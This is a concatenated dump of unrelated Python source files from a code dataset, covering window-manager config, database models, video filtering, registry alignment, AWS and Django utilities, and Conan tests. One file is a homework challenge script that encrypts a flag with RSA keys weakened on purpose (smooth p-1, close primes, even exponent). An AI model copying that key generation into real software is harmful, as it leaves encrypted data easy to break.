-q set Master 2dB+\")),\n Key([], \"XF86AudioLowerVolume\",\n lazy.spawn(\"amixer -c 0 -q set Master 2dB-\")),\n\n # Also allow changing volume the old fashioned way.\n Key([mod], \"equal\", lazy.spawn(\"amixer -c 0 -q set Master 2dB+\")),\n Key([mod], \"minus\", lazy.spawn(\"amixer -c 0 -q set Master 2dB-\")),\n\n]\n\ngroups = [Group(i) for i in \"1234567890\"]\n\nfor i in groups:\n\n keys.append(\n Key([alt], i.name, lazy.group[i.name].toscreen())\n )\n\n keys.append(\n Key([alt, \"shift\"], i.name, lazy.window.togroup(i.name))\n )\n\nlayouts = [\n layout.Stack(num_stacks=2),\n layout.Max()\n]\n\nwidget_defaults = dict(\n font='Arial',\n fontsize=16,\n padding=3,\n)\n\nscreens = [\n Screen(\n bottom=bar.Bar(\n [\n widget.GroupBox(active=\"#9393CC\",\n this_screen_border=\"#CC9393\",\n this_current_screen_border=\"#8DCBE2\"),\n widget.Sep(padding=10),\n widget.Prompt(),\n widget.WindowName(),\n widget.Sep(padding=10),\n widget.CPUGraph(graph_color=\"#9393CC\",\n fill_color=[\"#9393CC\", \"#001111\"]),\n widget.Sep(padding=10),\n widget.TextBox(text=\"Volume: \", foreground=\"#9393CC\"),\n widget.Volume(foreground=\"#9393CC\"),\n widget.Sep(padding=10),\n widget.TextBox(text=\"Battery: \", foreground=\"#8DCBE2\"),\n widget.Battery(format=\"{percent:2.0%} {char}\", discharge_char=\"~\", foreground=\"#8DCBE2\"),\n widget.TextBox(text=\"Est Time Rem: \", foreground=\"#8DCBE2\"),\n widget.Battery(format=\"{hour:d}:{min:02d}\", foreground=\"#8DCBE2\"),\n widget.Sep(padding=10),\n widget.Systray(),\n widget.Sep(padding=10),\n widget.Clock(format='%Y-%m-%d %a %I:%M %p', foreground=\"#9393CC\"),\n ],\n 30,\n ),\n ),\n]\n\n# Drag floating layouts.\nmouse = [\n Drag([alt], \"Button1\", lazy.window.set_position_floating(),\n start=lazy.window.get_position()),\n Drag([alt], \"Button3\", lazy.window.set_size_floating(),\n start=lazy.window.get_size()),\n Click([alt], \"Button2\", lazy.window.bring_to_front())\n]\n\ndgroups_key_binder = None\ndgroups_app_rules = []\nmain = None\nfollow_mouse_focus = True\nbring_front_click = False\ncursor_warp = False\nfloating_layout = layout.Floating()\nauto_fullscreen = True\nwmname = \"qtile\"\n","sub_path":"qtile/.config/qtile/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":4836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"19185251","text":"from sqlalchemy import Column, Integer, String, Text, ForeignKey, PickleType\n\nfrom sqlalchemy.orm import relationship\n\nfrom .database import Base, engine\n\nfrom flask.ext.login import UserMixin\n\nclass User(Base, UserMixin):\n __tablename__ = \"users\"\n \n id = Column(Integer, primary_key=True)\n name = Column(String(128))\n email = Column(String(128), unique=True)\n password = Column(String(128))\n character = relationship(\"Character\", backref=\"author\")\n\nclass Character(Base):\n __tablename__ = \"characters\"\n \n id = Column(Integer, primary_key=True)\n char_name = Column(String(1024))\n char_race = Column(String(128))\n char_class = Column(String(128))\n stats = Column(PickleType)\n skills = Column(PickleType)\n feats = Column(PickleType)\n features = Column(PickleType)\n traits = Column(PickleType)\n inventory = Column(PickleType)\n author_id = Column(Integer, ForeignKey('users.id'))\n \n \nBase.metadata.create_all(engine)","sub_path":"character_builder/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"472760214","text":"import cv2\nimport numpy as np\nfrom copy import copy\n\nvideo_r = cv2.VideoCapture(\"traffic.mp4\")\nfourcc = cv2.VideoWriter_fourcc(*'MJPG')\nvideo_w = cv2.VideoWriter(\"traffic_tilt.avi\",fourcc , video_r.get(cv2.CAP_PROP_FPS), (int(video_r.get(cv2.CAP_PROP_FRAME_WIDTH)),int(video_r.get(cv2.CAP_PROP_FRAME_HEIGHT))),True)\n\nl1 = 400\nl2 = 600\nd = 20\nm = 0\n\n\ndef alpha(x, l1, l2, d):\n return (0.5 * (np.tanh((x-l1)/(d+0.0001)) - np.tanh((x-l2)/(d+0.0001))))\n\ndef tilt_filter():\n global height, width, l1, l2, d\n array = np.ones([height,width])\n for y in range(height):\n array[y,:] *= alpha(y, l1, l2, d)\n return np.array(array,dtype=np.float32)\n\ndef applyTilt(image, image_2):\n global height, width, l1, l2, d, result\n filtro = tilt_filter()\n\n filtro_negativo = np.ones([height, width], dtype=np.float32) - filtro\n for i in range(depth):\n result[:,:,i] = cv2.multiply(filtro,image[:,:,i])\n result[:,:,i] += cv2.multiply(filtro_negativo,image_2[:,:,i])\n\nwhile True:\n ret, frame = video_r.read()\n if not ret:\n break\n ret, frame = video_r.read()\n if not ret:\n break\n ret, frame = video_r.read()\n if not ret:\n break\n if not ret:\n break\n ret, frame = video_r.read()\n if not ret:\n break\n\n\n\n height, width, depth = frame.shape\n result = np.zeros([height,width,depth])\n\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV).astype(\"float32\")\n (h, s, v) = cv2.split(frame)\n s = s * 1.5\n s = np.clip(s, 0, 255)\n frame = cv2.merge([h, s, v])\n frame = cv2.cvtColor(frame.astype(\"uint8\"), cv2.COLOR_HSV2BGR)\n frame = np.array(frame, dtype=np.float32)\n\n media = np.ones([3, 3], dtype=np.float32)\n mask = cv2.scaleAdd(media, 1 / 9.0, np.zeros([3, 3], dtype=np.float32))\n frame_blur = copy(frame)\n for i in range(10):\n frame_blur = cv2.filter2D(frame_blur, -1, mask, anchor=(1, 1))\n\n applyTilt(frame, frame_blur)\n\n result = np.array(result,dtype=np.uint8)\n # cv2.waitKey(2)\n\n # cv2.imshow(\"hola\", result)\n\n video_w.write(result)\n\nvideo_r.release()\nvideo_w.release()\ncv2.destroyAllWindows()\n\n\n\n","sub_path":"trab1/tiltshift_video.py","file_name":"tiltshift_video.py","file_ext":"py","file_size_in_byte":2133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"439395377","text":"# -*- coding: utf-8 -*-\n\n\"\"\"Align the OBO Foundry with the Bioregistry.\"\"\"\n\nimport requests\nimport requests.exceptions\nimport requests_ftp\n\nfrom ..external import get_obofoundry\nfrom ..utils import norm, secho, updater\n\nrequests_ftp.monkeypatch_session()\nsession = requests.Session()\n\nOBO_KEYS = {\n 'id',\n 'prefix',\n 'pattern',\n 'namespaceEmbeddedInLui',\n 'name',\n 'deprecated',\n 'description',\n 'homepage',\n}\n\n\ndef _prepare_obo(obofoundry_entry): # noqa:C901\n prefix = obofoundry_entry['id']\n rv = {\n 'prefix': prefix,\n 'name': obofoundry_entry['title'],\n 'deprecated': obofoundry_entry.get('is_obsolete', False),\n }\n\n license_dict = obofoundry_entry.get('license')\n if license_dict is not None:\n rv['license'] = license_dict['label']\n\n homepage = obofoundry_entry.get('homepage')\n if homepage is not None:\n rv['homepage'] = homepage\n\n contact_dict = obofoundry_entry.get('contact')\n if contact_dict is not None and contact_dict.get('email'):\n rv.update({\n 'contact': contact_dict['email'],\n 'contact.label': contact_dict['label'],\n })\n\n build = obofoundry_entry.get('build')\n if build is not None:\n method = build.get('method')\n if method is None and 'checkout in build':\n method = 'vcs'\n if method is None:\n secho(f'[{prefix}] missing method: {build}', fg='red')\n return rv\n\n if method == 'vcs':\n if 'system' not in build:\n secho(f'[{prefix}] missing build system', fg='red')\n return rv\n if build['system'] != 'git':\n secho(f'[{prefix}] unrecognized build system: {build[\"system\"]}', fg='red')\n return rv\n checkout = build['checkout'].replace(' ', ' ')\n if not checkout.startswith('git clone https://github.com/'):\n secho(f'[{prefix}] unhandled build checkout: {checkout}', fg='red')\n return rv\n\n owner, repo = checkout.removeprefix('git clone https://github.com/').removesuffix('.git').split('/')\n rv['repo'] = f'https://github.com/{owner}/{repo}.git'\n\n path = build.get('path', '.')\n if path == '.':\n obo_url = f'https://raw.githubusercontent.com/{owner}/{repo}/master/{prefix}.obo'\n else: # disregard the path since most repos don't actually use it anyway\n # TODO maybe try recovering if this doesn't work\n obo_url = f'https://raw.githubusercontent.com/{owner}/{repo}/master/{prefix}.obo'\n\n res = session.get(obo_url)\n if res.status_code == 200:\n rv['download.obo'] = obo_url\n else:\n secho(f\"[{prefix}] [http {res.status_code}] see {rv['repo']} [{path}]\", bold=True, fg='red')\n\n elif method == 'owl2obo':\n source_url = build['source_url']\n\n # parse repo if possible\n for url_prefix in ('https://github.com/', 'http://github.com/', 'https://raw.githubusercontent.com/'):\n if source_url.startswith(url_prefix):\n owner, repo, *_ = source_url.removeprefix(url_prefix).split('/')\n rv['repo'] = f'https://github.com/{owner}/{repo}.git'\n break\n\n if source_url.endswith('.obo'):\n rv['download.obo'] = source_url\n elif source_url.endswith('.owl'):\n obo_url = source_url.removesuffix('.owl') + '.obo'\n res = session.get(obo_url)\n if res.status_code == 200:\n rv['download.obo'] = source_url\n else:\n secho(f'[{prefix}] [http {res.status_code}] problem with {obo_url}', bold=True, fg='red')\n else:\n secho(f'[{prefix}] unhandled build.source_url: {source_url}', fg='red')\n\n elif method == 'obo2owl':\n source_url = build['source_url']\n if source_url.endswith('.obo'):\n res = session.get(source_url)\n if res.status_code == 200:\n rv['download.obo'] = source_url\n else:\n secho(f'[{prefix}] [http {res.status_code}] problem with {source_url}', bold=True, fg='red')\n else:\n secho(f'[{prefix}] unhandled extension {source_url}', bold=True, fg='red')\n else:\n secho(f'[{prefix}] unhandled build method: {method}', fg='red')\n\n return rv\n\n\n@updater\ndef align_obofoundry(registry):\n \"\"\"Update OBOFoundry references.\"\"\"\n obofoundry_id_to_bioregistry_id = {\n entry['obofoundry']['prefix']: key\n for key, entry in registry.items()\n if 'obofoundry' in entry\n }\n obofoundry_registry = get_obofoundry(mappify=True)\n\n obofoundry_norm_prefix_to_prefix = {\n norm(obo_key): obo_key\n for obo_key in obofoundry_registry\n }\n for bioregistry_id, entry in registry.items():\n if 'obofoundry' in entry:\n continue\n obofoundry_id = obofoundry_norm_prefix_to_prefix.get(norm(bioregistry_id))\n if obofoundry_id is not None:\n entry['obofoundry'] = {'prefix': obofoundry_id}\n obofoundry_id_to_bioregistry_id[obofoundry_id] = bioregistry_id\n\n for obofoundry_prefix, obofoundry_entry in obofoundry_registry.items():\n # Get key by checking the miriam.id key\n bioregistry_id = obofoundry_id_to_bioregistry_id.get(obofoundry_prefix)\n if bioregistry_id is None:\n if obofoundry_entry.get('is_obsolete'):\n secho(f'[{obofoundry_prefix}] skipping deprecated. If needed, add manually later', fg='yellow')\n continue\n\n bioregistry_id = obofoundry_prefix\n registry[bioregistry_id] = {}\n secho(f'[{obofoundry_prefix}] added: {obofoundry_entry[\"title\"]}', fg='green')\n\n try:\n registry[bioregistry_id]['obofoundry'] = _prepare_obo(obofoundry_entry)\n except requests.exceptions.ConnectionError as e:\n secho(f'[{bioregistry_id}] failed to get data: {e}', fg='red')\n continue\n\n return registry\n\n\nif __name__ == '__main__':\n align_obofoundry()\n","sub_path":"src/bioregistry/align/obofoundry.py","file_name":"obofoundry.py","file_ext":"py","file_size_in_byte":6262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"536360356","text":"#!/usr/bin/env python3\nimport json\nfrom Crypto.Util.number import *\nfrom gmpy2 import next_prime\nfrom random import randint\n\nflag = open('flag', 'rb').read()\n\ndef genkey():\n while True:\n while True:\n p = 2\n while size(p) < 512:\n p *= getPrime(randint(2, 12))\n if isPrime(p + 1):\n p = p + 1\n break\n r = randint(100, 2 ** 512)\n q1, q2 = int(next_prime(r)), int(next_prime(3 * next_prime(r)))\n n, phi = p * q1 * q2, (p - 1) * (q1 - 1) * (q2 - 1)\n e = 4 * randint(10, 100)\n if GCD(e, phi) == 4:\n return (p, q1, q2, n, e)\n\np, q1, q2, n, e = genkey()\nm = bytes_to_long(flag)\nc = pow(m, e, n)\n\nprint(json.dumps((n, e, c)))\n","sub_path":"homeworks/hw0x0a/Can_You_Decrypt/encrypt.py","file_name":"encrypt.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"230462281","text":"import os\nimport numpy as np\nfrom IPython import get_ipython\n\nimport matplotlib.pyplot as plt\n\n\ndef isnotebook():\n try:\n shell = get_ipython().__class__.__name__\n if shell == 'ZMQInteractiveShell': # Jupyter notebook or qtconsole?\n return True\n elif shell == 'TerminalInteractiveShell': # Terminal running IPython?\n return False\n else:\n return False # Other type (?)\n except NameError:\n return False # Probably standard Python interpreter\n\n\ndef plot_network_output(real_A, fake_B, real_B, fake_A, iteration):\n dirToSave = \"testResults/\"\n if not os.path.exists(dirToSave):\n os.makedirs(dirToSave)\n filePathName = dirToSave + \"test_\"\n fig, ax = plt.subplots(nrows=2, ncols=2, figsize=(18, 6))\n ax[(0, 0)].imshow(create_image(np.squeeze(real_A[0])), interpolation='nearest')\n ax[(0, 1)].imshow(create_image(np.squeeze(fake_B[0])), interpolation='nearest')\n ax[(0, 0)].axis('off')\n ax[(0, 1)].axis('off')\n ax[(1, 0)].imshow(create_image(np.squeeze(real_B[0])), cmap=plt.cm.gray, interpolation='nearest')\n ax[(1, 1)].imshow(create_image(np.squeeze(fake_A[0])), cmap=plt.cm.gray, interpolation='nearest')\n\n ax[(1, 0)].axis('off')\n ax[(1, 1)].axis('off')\n fig.suptitle('Input | Generated ')\n if (isnotebook()):\n plt.show()\n else:\n path = ''.join([filePathName, \"_\", str(iteration).zfill(4), '.png'])\n print(\"Saving network output 1 to {0}\".format(path))\n fig.savefig(path, dpi=100)\n\ndef create_image(im):\n # scale the pixel values from [-1,1] to [0,1]\n return (im + 1) / 2\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"431522791","text":"n, m = map(int, input().split())\nhappy = list(map(lambda x: int(x) + 1, input().split()))\n\ndef get_square_sum(x):\n nums = [i ** 2 for i in range(1, x+1)]\n return sum(nums)\n\ntotal = 0\nunhappy_days = m - sum(happy)\n\nif unhappy_days <= 0:\n print(total)\nelse:\n # unhappy_days를 n에 나눠서 느껴야 한다.\n # 10 to 3\n depress_list = [0 for _ in range(n + 1)]\n for i in range(unhappy_days):\n depress_list[i % (n + 1)] += 1\n print(sum(list(map(lambda x: get_square_sum(x), depress_list))))\n\n# 3 10\n# 1 1 1\n# 4 to 3\n# {-1} 1 0 {-1} 1 0 {-1} 1 0 {-1}\n","sub_path":"python/17392.py","file_name":"17392.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"502434375","text":"#!/usr/bin/env python\n\n#\n# Copyright 2018 Amazon.com, Inc. or its affiliates. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"). You may not use this file\n# except in compliance with the License. A copy of the License is located at\n#\n# http://aws.amazon.com/apache2.0/\n#\n# or in the \"license\" file accompanying this file. This file is distributed on an \"AS IS\"\n# BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations under the License.\n#\n\nimport sys\nimport boto3\nimport argparse\nfrom awscfnctl import CfnControl\n\nprogname = 'get_inst_from_asg'\n\ndef arg_parse():\n\n parser = argparse.ArgumentParser(prog=progname, description='List instances in an ASG')\n\n opt_group = parser.add_argument_group()\n opt_group.add_argument('-r', dest='region', required=False, help=\"Region name\")\n\n req_group = parser.add_argument_group('required arguments')\n req_group.add_argument('-a', dest='asg_name', required=True)\n\n return parser.parse_args()\n\n\ndef main():\n\n rc = 0\n\n args = arg_parse()\n\n region = args.region\n asg = args.asg_name\n\n cfn_client = CfnControl(region=region)\n\n instances = cfn_client.get_inst_from_asg(asg)\n\n for i in instances:\n print(' {}'.format(i))\n\n asg_status = cfn_client.ck_asg_inst_status(asg)\n\n return rc\n\nif __name__ == \"__main__\":\n try:\n sys.exit(main())\n except KeyboardInterrupt:\n print('\\nReceived Keyboard interrupt.')\n print('Exiting...')\n\n","sub_path":"aws-cfn-control/awscfnctl/get_inst_from_asg.py","file_name":"get_inst_from_asg.py","file_ext":"py","file_size_in_byte":1584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"417421330","text":"import logging\nfrom datetime import datetime, date\n\nfrom django.contrib.auth.models import User as Manager\nfrom django.contrib.postgres.fields import JSONField\nfrom django.core.exceptions import ValidationError\nfrom django.core.validators import validate_email\nfrom django.db import models, connections, transaction\nfrom django.db.models import Q\nfrom django.utils import timezone\nfrom django.utils.functional import cached_property\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom aster.models import Cdr\nfrom utils.models import dictfetchall, dict_diff\n\nlogger = logging.getLogger(__name__)\n\n\ndef distill(obj):\n new_obj = dict()\n for key, value in obj.items():\n if key.startswith('_') or isinstance(value, models.Model):\n continue\n elif isinstance(value, (datetime, date)):\n new_obj[key] = value.isoformat()\n else:\n new_obj[key] = value\n return new_obj\n\n\nclass UserManager(models.Manager):\n def create_user(self, *agrs, **kwargs):\n with transaction.atomic():\n manager = kwargs.pop('act_manager')\n comment = kwargs.pop('act_comment', '')\n user = self.model(**kwargs)\n user.save(force_insert=True)\n UserHistory.objects.create(manager_id=manager.id,\n user_id=user.id,\n act=1,\n comment=comment,\n new=distill(user.__dict__))\n return user\n\n def update_user(self, user, *agrs, **kwargs):\n with transaction.atomic():\n manager = kwargs.pop('act_manager')\n comment = kwargs.pop('act_comment', '')\n for attr, value in kwargs.items():\n setattr(user, attr, value)\n old, new = dict_diff(distill(user._loaded_values), distill(user.__dict__))\n if len(old) > 0 or len(new) > 0:\n user.save(force_update=True)\n UserHistory.objects.create(manager_id=manager.id,\n user_id=user.id,\n act=2,\n comment=comment,\n old=old,\n new=new)\n return user\n\n\nclass User(models.Model):\n SEX_OPT = (\n (1, 'М'),\n (2, 'Ж'),\n )\n JOB_OPT = (\n (1, 'ген.директор'),\n (2, 'директор'),\n (3, 'гл.бухгалтер'),\n (4, 'бухгалтер'),\n (5, 'секретарь'),\n (6, 'другое'),\n )\n uid = models.IntegerField(blank=True, null=True, help_text='uid из LanBilling для физ. лиц')\n company_uid = models.IntegerField(blank=True, null=True, help_text='uid из LanBilling для юр. лиц')\n group = models.ForeignKey('UserGroup', models.DO_NOTHING, blank=True, null=True)\n vip = models.BooleanField(default=False)\n sex = models.IntegerField(_('sex'), choices=SEX_OPT, blank=True, null=True, help_text='пол')\n birthday = models.DateField(blank=True, null=True, help_text='день рождения')\n company = models.CharField(max_length=255, blank=True, null=True, help_text='организация')\n job = models.IntegerField(choices=JOB_OPT, blank=True, null=True, help_text='должность')\n fullname = models.CharField(_('fullname'), max_length=255)\n surname = models.CharField(_('surname'), max_length=255, blank=True, null=True)\n name = models.CharField(_('name'), max_length=255, blank=True, null=True)\n patronymic = models.CharField(_('patronymic'), max_length=255, blank=True, null=True)\n comment = models.TextField(blank=True, null=True, help_text='комментарий')\n archive = models.BooleanField(default=False, help_text='запись удалена(флаг)')\n added = models.DateTimeField(auto_now_add=True, help_text='время добаления записи')\n updated = models.DateTimeField(auto_now=True, help_text='время изменения записи')\n manager = models.ForeignKey(Manager, models.DO_NOTHING, blank=True, null=True, help_text='ответственный менеджер')\n objects = UserManager()\n\n class Meta:\n db_table = 'addrbook_user'\n\n def __str__(self):\n return self.fullname\n\n @classmethod\n def from_db(cls, db, field_names, values):\n instance = super().from_db(db, field_names, values)\n instance._loaded_values = dict(zip(field_names, values))\n return instance\n\n @cached_property\n def contacts(self):\n \"\"\"\n Возвращает кортеж: список телефонов, список email-ов\n \"\"\"\n now = timezone.now()\n phones = []\n emails = []\n cl = list(self.contact_set\n .filter(timefrom__lte=now, timeto__isnull=True)\n .order_by('-primary', '-added'))\n for c in cl:\n if c.contact_type == 1:\n phones.append(c)\n else:\n emails.append(c)\n return phones, emails\n\n @cached_property\n def primary_phone(self):\n phones = self.contacts[0]\n if phones:\n return phones[0]\n\n @cached_property\n def primary_email(self):\n emails = self.contacts[1]\n if emails:\n return emails[0]\n\n def contacts_on_date(self, dt=None):\n if dt is None:\n return self.contacts\n if timezone.is_naive(dt):\n dt = timezone.make_aware(dt)\n return self.contact_set.filter(Q(timefrom__lte=dt, timeto__isnull=True) | Q(timefrom__lte=dt, timeto__gte=dt))\n\n @cached_property\n def recent_calls(self):\n phones = [x.part_1 for x in self.contacts[0]]\n if phones:\n # like = ['c.src LIKE \"%{0}\" or c.dst LIKE \"%{0}\"'.format(x) for x in phones]\n like = ['c.dst LIKE \"%{0}\"'.format(x) for x in phones]\n query = \"\"\"\n SELECT c.id, c.calldate, c.src, c.dst, c.did, c.duration, c.disposition, c.recordingfile\n FROM cdr c\n WHERE {0}\n ORDER BY c.id DESC\n \"\"\".format(' OR '.join(like))\n cursor = connections['asterisk'].cursor()\n cursor.execute(query)\n query_result = dictfetchall(cursor)\n cursor.close()\n return query_result[:5]\n\n @property\n def last_call(self):\n if self.recent_calls:\n return self.recent_calls[0]\n\n\nclass UserGroup(models.Model):\n name = models.CharField(max_length=255)\n descr = models.TextField(blank=True, null=True)\n\n class Meta:\n db_table = 'addrbook_user_group'\n\n def __str__(self):\n return self.name\n\n\nclass ContactManager(models.Manager):\n def create_contact(self, *agrs, **kwargs):\n with transaction.atomic():\n manager = kwargs.pop('act_manager')\n comment = kwargs.pop('act_comment', '')\n contact = self.model(**kwargs)\n if kwargs.get('primary', False):\n contact.unset_primary_from_other()\n contact.save(force_insert=True)\n ContactHistory.objects.create(manager_id=manager.id,\n contact_id=contact.id,\n act=1,\n comment=comment,\n new=distill(contact.__dict__))\n return contact\n\n def update_contact(self, contact, *agrs, **kwargs):\n with transaction.atomic():\n manager = kwargs.pop('act_manager')\n comment = kwargs.pop('act_comment', '')\n for attr, value in kwargs.items():\n setattr(contact, attr, value)\n if kwargs.get('primary', False):\n contact.unset_primary_from_other()\n old, new = dict_diff(distill(contact._loaded_values), distill(contact.__dict__))\n if len(old) > 0 or len(new) > 0:\n contact.save(force_update=True)\n ContactHistory.objects.create(manager_id=manager.id,\n contact_id=contact.id,\n act=2,\n comment=comment,\n old=old,\n new=new)\n return contact\n\n\nclass Contact(models.Model):\n TYPE_OPT = (\n (1, _('phone')),\n (2, _('email')),\n (3, _('sip')),\n (3, _('website')),\n )\n contact_type = models.IntegerField(choices=TYPE_OPT, default=1)\n contact_label = models.ForeignKey('ContactLabel', models.DO_NOTHING)\n user = models.ForeignKey('User', models.CASCADE)\n primary = models.BooleanField(default=False, help_text='основной контакт (флаг)')\n dirty = models.BooleanField(default=False)\n part_1 = models.CharField(max_length=255)\n part_2 = models.CharField(max_length=255, blank=True, null=True)\n timefrom = models.DateTimeField(default=timezone.now)\n timeto = models.DateTimeField(blank=True, null=True)\n comment = models.TextField(blank=True, null=True)\n added = models.DateTimeField(auto_now_add=True)\n updated = models.DateTimeField(auto_now=True)\n objects = ContactManager()\n\n class Meta:\n db_table = 'addrbook_contact'\n\n def __str__(self):\n n = self.part_1\n if self.part_2:\n n += ' доб.{0}'.format(self.part_2)\n return n\n\n @classmethod\n def from_db(cls, db, field_names, values):\n instance = super().from_db(db, field_names, values)\n instance._loaded_values = dict(zip(field_names, values))\n return instance\n\n def clean(self):\n if self.contact_type == 1:\n if not self.part_1.isnumeric():\n raise ValidationError('Enter a valid phone number.', code='invalid')\n elif self.contact_type == 2:\n validate_email(self.part_1)\n\n def unset_primary_from_other(self):\n (Contact.objects\n .filter(contact_type=self.contact_type, user_id=self.user_id)\n .exclude(id=self.id)\n .update(primary=False))\n # def save(self, *args, **kwargs):\n # if self._state.adding:\n # pass\n # else:\n # pass\n # super().save(*args, **kwargs)\n\n\nclass ContactHistory(models.Model):\n ACT_OPT = (\n (1, 'добавление'),\n (2, 'изменение'),\n )\n manager = models.ForeignKey(Manager, models.DO_NOTHING)\n contact = models.ForeignKey('Contact', models.DO_NOTHING)\n act = models.IntegerField(choices=ACT_OPT)\n dt = models.DateTimeField(auto_now_add=True)\n comment = models.TextField(blank=True, null=True)\n old = JSONField(default=dict())\n new = JSONField(default=dict())\n\n class Meta:\n db_table = 'addrbook_contact_history'\n\n def __str__(self):\n return '{0} {1}'.format(self.dt, self.comment)\n\n\nclass UserHistory(models.Model):\n ACT_OPT = (\n (1, 'добавление'),\n (2, 'изменение'),\n )\n manager = models.ForeignKey(Manager, models.DO_NOTHING)\n user = models.ForeignKey('User', models.DO_NOTHING)\n act = models.IntegerField(choices=ACT_OPT)\n dt = models.DateTimeField(auto_now_add=True)\n comment = models.TextField(blank=True, null=True)\n old = JSONField(default=dict())\n new = JSONField(default=dict())\n\n class Meta:\n db_table = 'addrbook_user_history'\n\n def __str__(self):\n return '{0} {1}'.format(self.dt, self.comment)\n\n\nclass ContactLabel(models.Model):\n name = models.CharField(max_length=255)\n name_short = models.CharField(max_length=10)\n\n class Meta:\n db_table = 'addrbook_contact_label'\n\n def __str__(self):\n return '{0}'.format(self.name_short)\n","sub_path":"web_plant/addrbook/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":11949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"561796030","text":"import os\nimport textwrap\nimport unittest\n\nfrom jinja2 import Template\n\nfrom conans.client.cache.cache import ClientCache\nfrom conans.client.conf import get_default_settings_yml\nfrom conans.client.profile_loader import ProfileLoader\nfrom conans.errors import ConanException\nfrom conans.test.utils.test_files import temp_folder\nfrom conans.util.files import save\n\n\nclass SettingsCppStdTests(unittest.TestCase):\n\n def setUp(self):\n self.tmp_folder = temp_folder()\n self.cache = ClientCache(self.tmp_folder)\n save(os.path.join(self.cache.plugins_path, \"profile.py\"), \"\")\n\n def _save_profile(self, compiler_cppstd=None, filename=\"default\"):\n fullpath = os.path.join(self.cache.profiles_path, filename)\n\n t = Template(textwrap.dedent(\"\"\"\n [settings]\n os=Macos\n arch=x86_64\n compiler=apple-clang\n {% if compiler_cppstd %}compiler.cppstd={{ compiler_cppstd }}{% endif %}\n compiler.libcxx=libc++\n compiler.version=10.0\n \"\"\"))\n\n save(fullpath, t.render(compiler_cppstd=compiler_cppstd))\n return filename\n\n def test_no_compiler_cppstd(self):\n # https://github.com/conan-io/conan/issues/5128\n fullpath = os.path.join(self.cache.profiles_path, \"default\")\n t = textwrap.dedent(\"\"\"\n [settings]\n os=Macos\n arch=x86_64\n compiler=apple-clang\n compiler.libcxx=libc++\n compiler.version=10.0\n compiler.cppstd = 14\n \"\"\")\n save(self.cache.settings_path, get_default_settings_yml().replace(\"cppstd\", \"foobar\"))\n save(fullpath, t)\n profile_loader = ProfileLoader(self.cache)\n with self.assertRaisesRegex(ConanException,\n \"'settings.compiler.cppstd' doesn't exist for 'apple-clang'\"):\n profile_loader.from_cli_args([\"default\"], None, None, None, None)\n\n def test_no_value(self):\n self._save_profile()\n profile_loader = ProfileLoader(self.cache)\n r = profile_loader.from_cli_args([\"default\"], None, None, None, None)\n self.assertNotIn(\"compiler.cppstd\", r.settings)\n\n def test_value_none(self):\n self._save_profile(compiler_cppstd=\"None\")\n profile_loader = ProfileLoader(self.cache)\n # It is incorrect to assign compiler.cppstd=None in the profile\n with self.assertRaisesRegex(ConanException, \"Invalid setting\"):\n r = profile_loader.from_cli_args([\"default\"], None, None, None, None)\n\n def test_value_valid(self):\n self._save_profile(compiler_cppstd=\"11\")\n profile_loader = ProfileLoader(self.cache)\n r = profile_loader.from_cli_args([\"default\"], None, None, None, None)\n self.assertEqual(r.settings[\"compiler.cppstd\"], \"11\")\n self.assertNotIn(\"cppstd\", r.settings)\n\n def test_value_invalid(self):\n self._save_profile(compiler_cppstd=\"13\")\n profile_loader = ProfileLoader(self.cache)\n with self.assertRaisesRegex(ConanException, \"Invalid setting '13' is not a valid \"\n \"'settings.compiler.cppstd' value\"):\n r = profile_loader.from_cli_args([\"default\"], None, None, None, None)\n","sub_path":"conans/test/unittests/client/profile_loader/compiler_cppstd_test.py","file_name":"compiler_cppstd_test.py","file_ext":"py","file_size_in_byte":3277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"234855139","text":"import argparse\nimport pathlib\n\n\ndef get_core_parser(extra_args=False):\n \"\"\"\n Sub-parser containing core audio module arguments. Used by both yamfp\n in this module and by the top-level yam command.\n\n Args:\n extra_args (bool): Include extra args required not required for\n spectrogram/fingerprint visualization by the yamfp CLI.\n \"\"\"\n core_parser = argparse.ArgumentParser(add_help=False)\n\n fingerprint_args = core_parser.add_argument_group(\"fingerprint arguments\")\n\n fingerprint_args.add_argument(\n \"--erosion-iterations\", type=int, default=1, metavar=\"\",\n help=\"Number of times to apply binary erosion for peak finding\"\n )\n fingerprint_args.add_argument(\n \"-f\", \"--fanout\", type=int, default=10, metavar=\"\",\n help=\"Number of adjacent peaks to consider for generating hashes\"\n )\n fingerprint_args.add_argument(\n \"--filter-connectivity\", type=int, default=1, choices=(1, 2),\n help=\"Max filter neighborhood connectivity for peak finding\"\n )\n fingerprint_args.add_argument(\n \"--filter-dilation\", type=int, default=10, metavar=\"\",\n help=\"Max filter dilation (neighborhood size) for peak finding\"\n )\n\n if extra_args:\n fingerprint_args.add_argument(\n \"-l\", \"--hash-length\", type=int, default=40, metavar=\"\",\n help=\"Truncate fingerprint SHA1 hashes to --hash-length (max 40)\"\n )\n\n fingerprint_args.add_argument(\n \"--max-time-delta\", type=float, default=100, metavar=\"\",\n help=\"Target zone max time offset difference for hashes\"\n 